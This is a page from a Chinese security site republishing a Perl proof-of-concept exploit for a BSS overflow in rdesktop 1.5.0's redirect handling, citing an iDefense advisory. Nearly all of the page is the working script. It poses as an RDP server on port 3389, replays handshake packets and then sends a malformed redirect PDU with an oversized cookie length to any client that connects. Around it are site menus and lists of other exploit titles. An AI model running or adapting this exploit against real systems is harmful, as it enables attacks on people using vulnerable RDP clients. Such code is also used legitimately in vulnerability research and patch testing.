首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
rdesktop 1.5.0 process_redirect_pdu() BSS Overflow Vulnerability PoC
来源:www.vfcocus.net 作者:vfocus 发布时间:2008-05-12  

rdesktop 1.5.0 process_redirect_pdu() BSS Overflow Vulnerability PoC

#!/usr/bin/perl
#
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=697

use strict;
use IO::Socket;

my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!);

my $evil = "\x03\x00\x01\x47\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x81\x38" .
"\x01\x00\x10\x00" .
"\xc5\x32" .
"\x04\x75" . # PDU TYPE == 0x4 == PDU_REDIRECT
"\xb7\xda\xf8\x43" .
"\x01\x00\x00\x00" .
"\x01\x00\x00\x00" .
"\xff\xff\xff\xff" . # len of g_redirect_cookie
"\x41" x 64 ; # g_redirect_cookie

while(my $c = $sock->accept())
{
while(<$c>)
{
print $c ONE(), TWO(), THREE(), FOUR(), FIVE(), SIX(), SEVEN(), $evil;
}
}




sub ONE()
{
"\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00"
}

sub TWO()
{
"\x03\x00\x01\x49\x02\xf0\x80\x7f\x66\x82\x01".
"\x3d\x0a\x01\x00\x02\x01\x00\x30\x1a\x02\x01".
"\x22\x02\x01\x03\x02\x01\x00\x02\x01\x01\x02".
"\x01\x00\x02\x01\x01\x02\x03\x00\xff\xf8\x02".
"\x01\x02\x04\x82\x01\x17\x00\x05\x00\x14\x7c".
"\x00\x01\x2a\x14\x76\x0a\x01\x01\x00\x01\xc0".
"\x00\x4d\x63\x44\x6e\x81\x00\x01\x0c\x08\x00".
"\x04\x00\x08\x00\x03\x0c\x0c\x00\xeb\x03\x01".
"\x00\xec\x03\x00\x00\x02\x0c\xec\x00\x02\x00".
"\x00\x00\x02\x00\x00\x00\x20\x00\x00\x00\xb8".
"\x00\x00\x00\x29\x60\xbb\x2f\xc4\x4d\x00\x9e".
"\x58\x8a\xb4\x85\x35\x6a\x71\xea\xad\xf9\x3d".
"\x0e\x5e\x8e\x87\x64\x2d\x52\x42\xed\xb2\x91".
"\x3f\xf9\x01\x00\x00\x00\x01\x00\x00\x00\x01".
"\x00\x00\x00\x06\x00\x5c\x00\x52\x53\x41\x31".
"\x48\x00\x00\x00\x00\x02\x00\x00\x3f\x00\x00".
"\x00\x01\x00\x01\x00\xf9\xa3\x35\xb2\x78\x63".
"\x8d\x94\x65\x47\x22\x54\x49\x55\xae\x6f\x74".
"\x69\x73\x6e\xee\x2b\xa5\xd0\x47\xf6\xc0\x89".
"\x2e\xa0\x54\xf5\x12\x87\x75\xb5\x89\xf7\x83".
"\x48\xd9\x54\xeb\xde\x20\x73\xd6\xd8\xf3\xee".
"\x0f\xf7\xc2\xaa\xa4\x79\x0a\x5a\x64\x92\x53".
"\xc4\x75\xd4\x00\x00\x00\x00\x00\x00\x00\x00".
"\x08\x00\x48\x00\xf6\x20\x04\x62\x5b\x2f\x04".
"\xae\x02\x04\x4a\x7e\xcf\x59\x02\x11\xf7\x7f".
"\xab\x74\x95\xce\x01\x4e\xf6\x14\x50\x0b\xd7".
"\x54\x8f\xf0\x92\xd5\x0c\x6f\x42\xd8\x21\x98".
"\x9f\x87\x50\x9a\x33\x6c\xef\x65\x05\x5c\x4a".
"\x93\x51\xc1\x69\x59\x7c\x3d\xf4\x63\xdc\x53".
"\x66\x3b\x00\x00\x00\x00\x00\x00\x00\x00"
}

sub THREE()
{
"\x03\x00\x00\x0b\x02\xf0\x80\x2e\x00\x00\x04"
}

sub FOUR()
{
"\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xed\x03\xed"
}

sub FIVE()
{
"\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xeb\x03\xeb"
}

sub SIX()
{
"\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xec\x03\xec"
}

sub SEVEN()
{
"\x03\x00\x00\x22\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x14\x80\x02\x10\x00\xff\x03\x10\x00\x07\x00\x00\x00\x02\x00\x00\x00\x30\x9a\x00\x00"
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Joomla Component com_datsogall
·Joomla Component xsstream-dm 0
·txtCMS 0.3 (index.php) Local F
·QuickUpCMS Multiple Remote SQL
·Vortex CMS (index.php pageid)
·Battle.net Clan Script <= 1.5.
·Secure File Delete Wizard <= 2
·CMS Made Simple <= 1.2.4 (File
·Registry Pro (epRegPro.ocx) Re
·Advanced Image Hosting (AIH) 2
·EvansFTP (EvansFTP.ocx) Remote
·EQDKP 1.3.2f (user_id) Authent
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved